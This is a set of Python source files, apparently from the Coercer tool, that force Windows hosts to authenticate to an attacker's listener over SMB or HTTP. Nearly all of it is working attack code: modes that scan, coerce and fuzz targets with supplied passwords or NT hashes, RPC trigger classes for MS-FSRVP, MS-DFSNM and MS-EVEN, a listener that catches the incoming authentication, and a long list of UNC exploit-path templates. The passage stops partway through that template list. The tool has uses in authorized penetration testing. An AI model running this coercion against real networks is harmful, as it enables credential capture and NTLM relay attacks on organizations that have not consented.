    # Creating the "coerce" subparser ==============================================================================================================
    mode_coerce = argparse.ArgumentParser(add_help=False)
    mode_coerce.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode (default: False)")
    # Advanced configuration
    mode_coerce_advanced_config = mode_coerce.add_argument_group("Advanced configuration")
    mode_coerce_advanced_config.add_argument("--delay", default=None, type=int, help="Delay between attempts (in seconds)")
    mode_coerce_advanced_config.add_argument("--http-port", default=80, type=int, help="HTTP port (default: 80)")
    mode_coerce_advanced_config.add_argument("--smb-port", default=445, type=int, help="SMB port (default: 445)")
    mode_coerce_advanced_config.add_argument("--always-continue", default=False, action="store_true", help="Always continue to coerce")
    mode_coerce_advanced_config.add_argument("--auth-type", default=None, type=str, help="Desired authentication type ('smb' or 'http').")
    # Filters
    mode_coerce_filters = mode_coerce.add_argument_group("Filtering methods")
    mode_coerce_filters.add_argument("--filter-method-name", default=None, type=str, help="")
    mode_coerce_filters.add_argument("--filter-protocol-name", default=None, type=str, help="")
    # Credentials
    mode_coerce_credentials = mode_coerce.add_argument_group("Credentials")
    mode_coerce_credentials.add_argument("-u", "--username", default="", help="Username to authenticate to the machine.")
    mode_coerce_credentials.add_argument("-p", "--password", default="", help="Password to authenticate to the machine. (if omitted, it will be asked unless -no-pass is specified)")
    mode_coerce_credentials.add_argument("-d", "--domain", default="", help="Windows domain name to authenticate to the machine.")
    mode_coerce_credentials.add_argument("--hashes", action="store", metavar="[LMHASH]:NTHASH", help="NT/LM hashes (LM hash can be empty)")
    mode_coerce_credentials.add_argument("--no-pass", action="store_true", help="Don't ask for password (useful for -k)")
    mode_coerce_credentials.add_argument("--dc-ip", action="store", metavar="ip address", help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
    # Targets source
    mode_coerce_targets_source = mode_coerce.add_mutually_exclusive_group(required=True)
    mode_coerce_targets_source.add_argument("-t", "--target-ip", default=None, help="IP address or hostname of the target machine")
    mode_coerce_targets_source.add_argument("-f", "--targets-file", default=None, help="File containing a list of IP address or hostname of the target machines")
    # Listener
    listener_group = mode_coerce.add_argument_group("Listener")
    listener_group.add_argument("-l", "--listener-ip", required=True, type=str, help="IP address or hostname of the listener machine")

    # Adding the subparsers to the base parser
    subparsers = parser.add_subparsers(help="Mode", dest="mode", required=True)
    mode_scan_parser = subparsers.add_parser("scan", parents=[mode_scan], help="Tests known methods with known working paths on all methods, and report when an authentication is received.")
    mode_coerce_parser = subparsers.add_parser("coerce", parents=[mode_coerce], help="Trigger authentications through all known methods with known working paths")
    mode_fuzz_parser = subparsers.add_parser("fuzz", parents=[mode_fuzz], help="Tests every method with a list of exploit paths, and report when an authentication is received.")

    options = parser.parse_args()

    # Parsing hashes
    lmhash, nthash = '', ''
    if options.hashes is not None:
        lmhash, nthash = options.hashes.split(':')
    if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
        from getpass import getpass
        options.password = getpass("Password:")

    return lmhash, nthash, options


def main():
    available_methods = find_and_load_coerce_methods()

    lmhash, nthash, options = parseArgs()

    reporter = Reporter(verbose=options.verbose, options=options)

    # Parsing targets
    targets = []
    if options.target_ip is not None:
        targets = [options.target_ip]
    elif options.targets_file is not None:
        if os.path.exists(options.targets_file):
            f = open(options.targets_file, 'r')
            targets = sorted(list(set([line.strip() for line in f.readlines()])))
            f.close()
            reporter.print_verbose("Loaded %d targets." % len(targets))
        else:
            print("[!] Could not open targets file '%s'." % options.targets_file)
            sys.exit(0)

    credentials = Credentials(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash)

    # Processing actions
    if options.mode == "coerce":
        reporter.print_info("Starting coerce mode")
        for target in targets:
            reporter.print_info("Scanning target %s" % target)
            # Checking credentials if any
            if try_login(credentials, target, verbose=options.verbose):
                # Starting action
                action_coerce(target, available_methods, options, credentials, reporter)

    elif options.mode == "scan":
        reporter.print_info("Starting scan mode")
        for target in targets:
            reporter.print_info("Scanning target %s" % target)
            # Checking credentials if any
            if try_login(credentials, target, verbose=options.verbose):
                # Starting action
                action_scan(target, available_methods, options, credentials, reporter)
                # Reporting results
                if options.export_json is not None:
                    reporter.exportJSON(options.export_json)
                if options.export_xlsx is not None:
                    reporter.exportXLSX(options.export_xlsx)
                if options.export_sqlite is not None:
                    reporter.exportSQLITE(target, options.export_sqlite)

    elif options.mode == "fuzz":
        reporter.print_info("Starting fuzz mode")
        for target in targets:
            reporter.print_info("Fuzzing target %s" % target)
            # Checking credentials if any
            if try_login(credentials, target, options):
                # Starting action
                action_fuzz(target, available_methods, options, credentials, reporter)
                # Reporting results
                if options.export_json is not None:
                    reporter.exportJSON(options.export_json)
                if options.export_xlsx is not None:
                    reporter.exportXLSX(options.export_xlsx)
                if options.export_sqlite is not None:
                    reporter.exportSQLITE(target, options.export_sqlite)

    print("[+] All done! Bye Bye!")

if __name__ == '__main__':
    main()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : DCERPCSessionError.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from impacket import system_errors
from impacket.dcerpc.v5.rpcrt import DCERPCException


class DCERPCSessionError(DCERPCException):
    """

    """

    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        key = self.error_code
        if key in system_errors.ERROR_MESSAGES:
            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
            return 'SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
        else:
            return 'SessionError: unknown error code: 0x%x' % self.error_code



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : IsPathShadowCopied.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _IsPathShadowCopied(NDRCALL):
    """
    Structure to make the RPC call to IsPathShadowCopied() in MS-FSRVP Protocol
    """
    opnum = 9
    structure = (
        ('ShareName', WSTR),  # Type: LPWSTR
    )


class _IsPathShadowCopiedResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to IsPathShadowCopied() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
    """
    structure = ()


class IsPathShadowCopied(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function IsPathShadowCopied (opnum 9) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\Fssagentrpc",
                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
        "shortname": "MS-FSRVP"
    }

    function = {
        "name": "IsPathShadowCopied",
        "opnum": 9,
        "vulnerable_arguments": ["ShareName"]
    }

    def trigger(self, dcerpc_session, target):
        if dcerpc_session is not None:
            try:
                request = _IsPathShadowCopied()
                request['ShareName'] = self.path
                resp = dcerpc_session.request(request)
                return ""
            except Exception as err:
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : NetrDfsRemoveStdRootResponse.py
# Author             : Podalirius (@podalirius_)
# Date created       : 14 Sep 2022

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from coercer.core.utils import gen_random_name
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _NetrDfsRemoveStdRoot(NDRCALL):
    """
    Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol
    """
    opnum = 13
    structure = (
        ('ServerName', WSTR),  # Type: WCHAR *
        ('RootShare', WSTR),   # Type: WCHAR *
        ('ApiFlags', DWORD)    # Type: DWORD
    )


class _NetrDfsRemoveStdRootResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol
    """
    structure = ()


class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)
    """

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    function = {
        "name": "NetrDfsRemoveStdRoot",
        "opnum": 13,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session):
        if dcerpc_session is not None:
            try:
                request = _NetrDfsRemoveStdRoot()
                request['ServerName'] = self.path
                request['RootShare'] = gen_random_name() + '\x00'
                request['ApiFlags'] = 0
                resp = dcerpc_session.request(request)
                return ""
            except Exception as err:
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : MethodFilter.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

class MethodFilter(object):
    """
    Documentation for class MethodFilter
    """

    def __init__(self, filter_method_name=None, filter_protocol_name=None):
        super(MethodFilter, self).__init__()
        self.filter_method_name = filter_method_name
        self.filter_protocol_name = filter_protocol_name

    def matches_filter(self, instance):
        """
        Function matches_filter

        Parameters:
            ?:instance

        Return:
            bool:outcome
        """
        outcome = True
        #
        if self.filter_method_name is not None:
            if self.filter_method_name in instance.function["name"]:
                outcome = outcome and True
            else:
                outcome = outcome and False
        #
        if self.filter_protocol_name is not None:
            if (self.filter_protocol_name in instance.protocol["shortname"]) or (self.filter_protocol_name in instance.protocol["longname"]):
                outcome = outcome and True
            else:
                outcome = outcome and False
        return outcome
    



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : ElfrOpenBELW.py
# Author             : Podalirius (@podalirius_)
# Date created       : 11 Dec 2022


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5 import even
from impacket.dcerpc.v5.dtypes import NULL


class ElfrOpenBELW(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)

    Method found by:
     - [@evilashz](https://github.com/evilashz/)
    """

    exploit_paths = [
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
    ]

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\eventlog",
                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
                "version": "0.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
        "shortname": "MS-EVEN"
    }

    function = {
        "name": "ElfrOpenBELW",
        "opnum": 9,
        "vulnerable_arguments": ["BackupFileName"]
    }

    def trigger(self, dcerpc_session, target):
        if dcerpc_session is not None:
            try:
                self.path = self.path.rstrip('\x00')
                request = even.ElfrOpenBELW()
                request['UNCServerName'] = NULL
                request['BackupFileName'] = self.path
                request['MajorVersion'] = 1
                request['MinorVersion'] = 1
                resp = dcerpc_session.request(request)
                resp.dump()
                return ""
            except Exception as err:
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : MSPROTOCOLRPCCALL.py
# Author             : Podalirius (@podalirius_)
# Date created       : 16 Sep 2022

import jinja2
from coercer.structures.MethodType import MethodType


class MSPROTOCOLRPCCALL(object):
    """
    Documentation for class MSPROTOCOLRPCCALL
    """

    method_type = MethodType.MICROSOFT_PROTOCOL

    exploit_paths = []

    path = None

    protocol = {
        "longname": "",
        "shortname": ""
    }

    function = {
        "name": "",
        "opnum": 0
    }

    def __init__(self, path):
        super(MSPROTOCOLRPCCALL, self).__init__()
        self.path = path
        
    def __str__(self):
        parameters = []
        from sys import platform
        if platform == "linux" or platform == "linux2":
            # linux
            function_template = "%s──>\x1b[96m%s\x1b[0m(%s)"
            parameter_template = "\x1b[94m%s\x1b[0m=\x1b[93m%s\x1b[0m"
        elif platform == "darwin":
            # OS X
            function_template = "%s──>%s(%s)"
            parameter_template = "\x1b[94m%s\x1b[0m=\x1b[93m%s\x1b[0m"
        elif platform == "win32":
            # Windows...
            function_template = "%s──>%s(%s)"
            parameter_template = "%s=%s"


        for arg in self.function["vulnerable_arguments"]:
            parameters.append(
                parameter_template % (
                    arg,
                    str(bytes(self.path, 'utf-8'))[1:].replace('\\\\', '\\')
                )
            )
        parameters = ', '.join(parameters)

        return function_template % (
            self.protocol["shortname"],
            self.function["name"],
            parameters
        )

    @classmethod
    def generate_exploit_templates(cls, desired_auth_type=None):
        paths = []
        for auth_type, exploit_path in cls.exploit_paths:
            if desired_auth_type is not None:
                if auth_type == desired_auth_type:
                    paths.append((auth_type, exploit_path))
            else:
                paths.append((auth_type, exploit_path))
        return paths




#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : authentications.py
# Author             : Podalirius (@podalirius_)
# Date created       : 21 Sep 2022


from coercer.structures.TestResult import TestResult
from concurrent.futures import ThreadPoolExecutor
from coercer.network.Listener import Listener
import time


def trigger_and_catch_authentication(options, dcerpc_session, target, method_trigger_function, listenertype, listen_ip=None, http_port=80):
    """

    """
    listenertype = listenertype.lower()
    if listenertype not in ["smb", "http"]:
        print("[!] Unknown listener type '%s'" % listenertype)
        return False
    else:
        control_structure = {"result": TestResult.NO_AUTH_RECEIVED}
        # Waits for all the threads to be completed

        with ThreadPoolExecutor(max_workers=3) as tp:
            listener_instance = Listener(options=options, listen_ip=listen_ip)

            if listenertype == "smb":
                # print("[debug] Created smb listener")
                tp.submit(listener_instance.start_smb, control_structure)

            elif listenertype == "http":
                # print("[debug] Created http listener")
                tp.submit(listener_instance.start_http, control_structure, http_port=http_port)

            time.sleep(0.25)
            result_trigger = tp.submit(method_trigger_function, dcerpc_session, target)

        if control_structure["result"] == TestResult.NO_AUTH_RECEIVED:
            if "rpc_x_bad_stub_data" in str(result_trigger._result):
                control_structure["result"] = TestResult.RPC_X_BAD_STUB_DATA

            elif "nca_s_unk_if" in str(result_trigger._result):
                control_structure["result"] = TestResult.NCA_S_UNK_IF

            elif "rpc_s_access_denied" in str(result_trigger._result):
                control_structure["result"] = TestResult.RPC_S_ACCESS_DENIED

            elif "ERROR_BAD_NETPATH" in str(result_trigger._result):
                control_structure["result"] = TestResult.ERROR_BAD_NETPATH

            elif "ERROR_INVALID_NAME" in str(result_trigger._result):
                control_structure["result"] = TestResult.ERROR_INVALID_NAME

            elif "STATUS_PIPE_DISCONNECTED" in str(result_trigger._result):
                control_structure["result"] = TestResult.SMB_STATUS_PIPE_DISCONNECTED

            elif "RPC_S_INVALID_BINDING" in str(result_trigger._result):
                control_structure["result"] = TestResult.RPC_S_INVALID_BINDING

            elif "RPC_S_INVALID_NET_ADDR" in str(result_trigger._result):
                control_structure["result"] = TestResult.RPC_S_INVALID_NET_ADDR

        return control_structure["result"]


def trigger_authentication(dcerpc_session, target, method_trigger_function):
    """

    """
    control_structure = {"result": TestResult.NO_AUTH_RECEIVED}

    result_trigger = method_trigger_function(dcerpc_session, target)

    if control_structure["result"] == TestResult.NO_AUTH_RECEIVED:
        if "rpc_x_bad_stub_data" in str(result_trigger):
            control_structure["result"] = TestResult.RPC_X_BAD_STUB_DATA

        elif "nca_s_unk_if" in str(result_trigger):
            control_structure["result"] = TestResult.NCA_S_UNK_IF

        elif "rpc_s_access_denied" in str(result_trigger):
            control_structure["result"] = TestResult.RPC_S_ACCESS_DENIED

        elif "ERROR_BAD_NETPATH" in str(result_trigger):
            control_structure["result"] = TestResult.ERROR_BAD_NETPATH

        elif "ERROR_INVALID_NAME" in str(result_trigger):
            control_structure["result"] = TestResult.ERROR_INVALID_NAME

        elif "STATUS_PIPE_DISCONNECTED" in str(result_trigger):
            control_structure["result"] = TestResult.SMB_STATUS_PIPE_DISCONNECTED

        elif "RPC_S_INVALID_BINDING" in str(result_trigger):
            control_structure["result"] = TestResult.RPC_S_INVALID_BINDING

        elif "RPC_S_INVALID_NET_ADDR" in str(result_trigger):
            control_structure["result"] = TestResult.RPC_S_INVALID_NET_ADDR

    return control_structure["result"]


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : Reporter.py
# Author             : Podalirius (@podalirius_)
# Date created       : 17 Jul 2022

import sqlite3
import os
import json
import xlsxwriter
import sys
from coercer.structures.ReportingLevel import ReportingLevel
from coercer.structures.TestResult import TestResult


CURSOR_UP_ONE = '\x1b[1A'
ERASE_LINE = '\x1b[2K'


class Reporter(object):
    """
    Documentation for class Reporter
    """

    def __init__(self, options, verbose=False):
        super(Reporter, self).__init__()
        self.options = options
        self.verbose = verbose
        self.test_results = {}

    def print_testing(self, msprotocol_rpc_instance):
        print("      [>] (\x1b[93m%s\x1b[0m) %s " % ("-testing-", str(msprotocol_rpc_instance)))
        sys.stdout.flush()

    def print_info(self, message):
        print("\x1b[1m[\x1b[92minfo\x1b[0m\x1b[1m]\x1b[0m %s" % message)
        sys.stdout.flush()

    def print_verbose(self, message):
        print("[debug]",message)

    def report_test_result(self, uuid, version, namedpipe, msprotocol_rpc_instance, result, exploitpath):
        function_name = msprotocol_rpc_instance.function["name"]
        if uuid not in self.test_results.keys():
            self.test_results[uuid] = {}
        if version not in self.test_results[uuid].keys():
            self.test_results[uuid][version] = {}
        if function_name not in self.test_results[uuid][version].keys():
            self.test_results[uuid][version][function_name] = {}
        if namedpipe not in self.test_results[uuid][version][function_name].keys():
            self.test_results[uuid][version][function_name][namedpipe] = []

        # Save result to database
        self.test_results[uuid][version][function_name][namedpipe].append({
            "function": msprotocol_rpc_instance.function,
            "protocol": msprotocol_rpc_instance.protocol,
            "testresult": result.name,
            "exploitpath": exploitpath
        })

        sys.stdout.write(CURSOR_UP_ONE)
        sys.stdout.write(ERASE_LINE)
        if self.options.mode in ["scan", "fuzz"]:
            if result == TestResult.SMB_AUTH_RECEIVED:
                print("      [\x1b[1;92m+\x1b[0m] (\x1b[1;92m%s\x1b[0m) %s " % ("SMB  Auth", str(msprotocol_rpc_instance)))
                sys.stdout.flush()
            elif result == TestResult.HTTP_AUTH_RECEIVED:
                print("      [\x1b[1;92m+\x1b[0m] (\x1b[1;92m%s\x1b[0m) %s " % ("HTTP Auth", str(msprotocol_rpc_instance)))
                sys.stdout.flush()
            elif result == TestResult.NCA_S_UNK_IF:
                print("      [\x1b[1;95m-\x1b[0m] (\x1b[1;95m%s\x1b[0m) %s " % ("-No Func-", str(msprotocol_rpc_instance)))
                sys.stdout.flush()
            else:
                if self.verbose:
                    print("      [\x1b[1;91m!\x1b[0m] (\x1b[1;91m%s\x1b[0m) %s " % (result.name, str(msprotocol_rpc_instance)))
                    sys.stdout.flush()
        elif self.options.mode in ["coerce"]:
            if result == TestResult.ERROR_BAD_NETPATH:
                print("      [\x1b[1;92m+\x1b[0m] (\x1b[1;92m%s\x1b[0m) %s " % ("ERROR_BAD_NETPATH", str(msprotocol_rpc_instance)))
                sys.stdout.flush()
            else:
                if self.verbose:
                    print("      [\x1b[1;91m!\x1b[0m] (\x1b[1;91m%s\x1b[0m) %s " % (result.name, str(msprotocol_rpc_instance)))
                    sys.stdout.flush()

    def exportXLSX(self, filename):
        basepath = os.path.dirname(filename)
        filename = os.path.basename(filename)
        if basepath not in [".", ""]:
            if not os.path.exists(basepath):
                os.makedirs(basepath)
            path_to_file = basepath + os.path.sep + filename
        else:
            path_to_file = filename
        # export

        workbook = xlsxwriter.Workbook(path_to_file)
        worksheet = workbook.add_worksheet()

        header_format = workbook.add_format({'bold': 1})
        header_fields = ["Interface UUID", "Interface version", "SMB named pipe", "Protocol long name", "Protocol short name", "RPC function name", "Operation number", "Result", "Working path"]
        for k in range(len(header_fields)):
            worksheet.set_column(k, k + 1, len(header_fields[k]) + 3)
        worksheet.set_row(0, 60, header_format)
        worksheet.write_row(0, 0, header_fields)

        row_id = 1
        for uuid in self.test_results.keys():
            for version in self.test_results[uuid].keys():
                for function_name in self.test_results[uuid][version].keys():
                    for namedpipe in self.test_results[uuid][version][function_name].keys():
                        for test_result in self.test_results[uuid][version][function_name][namedpipe]:
                            data = [uuid, version, namedpipe, test_result["protocol"]["longname"], test_result["protocol"]["shortname"], test_result["function"]["name"], test_result["function"]["opnum"], test_result["testresult"], test_result["exploitpath"]]
                            worksheet.write_row(row_id, 0, data)
                            row_id += 1
        worksheet.autofilter(0, 0, row_id, len(header_fields) - 1)
        workbook.close()
        self.print_info("Results exported to XLSX in '%s'" % path_to_file)

    def exportJSON(self, filename):
        basepath = os.path.dirname(filename)
        filename = os.path.basename(filename)
        if basepath not in [".", ""]:
            if not os.path.exists(basepath):
                os.makedirs(basepath)
            path_to_file = basepath + os.path.sep + filename
        else:
            path_to_file = filename
        # export
        f = open(path_to_file, "w")
        f.write(json.dumps(self.test_results, indent=4))
        f.close()
        self.print_info("Results exported to JSON in '%s'" % path_to_file)

    def exportSQLITE(self, target, filename):
        basepath = os.path.dirname(filename)
        filename = os.path.basename(filename)
        if basepath not in [".", ""]:
            if not os.path.exists(basepath):
                os.makedirs(basepath)
            path_to_file = basepath + os.path.sep + filename
        else:
            path_to_file = filename
        # Exporting results
        # Connecting to sqlite
        conn = sqlite3.connect(path_to_file)
        # Creating a cursor object using the cursor() method
        cursor = conn.cursor()
        cursor.execute("CREATE TABLE IF NOT EXISTS results(target VARCHAR(255), uuid VARCHAR(255), version VARCHAR(255), named_pipe VARCHAR(255), protocol_shortname VARCHAR(255), protocol_longname VARCHAR(512), function_name VARCHAR(255), result VARCHAR(255), path VARCHAR(512));")
        for uuid in self.test_results.keys():
            for version in self.test_results[uuid].keys():
                for function_name in self.test_results[uuid][version].keys():
                    for named_pipe in self.test_results[uuid][version][function_name].keys():
                        for test_result in self.test_results[uuid][version][function_name][named_pipe]:
                            cursor.execute("INSERT INTO results VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)", (
                                    target,
                                    uuid,
                                    version,
                                    named_pipe,
                                    test_result["protocol"]["shortname"],
                                    test_result["protocol"]["longname"],
                                    function_name,
                                    test_result["testresult"],
                                    str(bytes(test_result["exploitpath"], 'utf-8'))[2:-1].replace('\\\\', '\\')
                                )
                            )
        # Commit your changes in the database
        conn.commit()
        # Closing the connection
        conn.close()
        self.print_info("Results exported to SQLITE3 db in '%s'" % path_to_file)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : utils.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022


import random
import jinja2


def gen_random_name(length=8):
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    name = ""
    for k in range(length):
        name += random.choice(alphabet)
    return name


def generate_exploit_templates(desired_auth_type=None):
    add_uncommon_tests = False

    templates = [
        # Only ip
        ("smb", '{{listener}}\x00'),
        # SMB
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with ?
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with .
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ?
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ??
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with .
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\x00')
    ]

    if add_uncommon_tests:
        templates += [

            # HTTP
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),

            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),

            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
            ("smb", '\\UNC\\{{listener}}\\\x00'),
            ("smb", '\\UNC\\{{listener}}\x00'),

            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
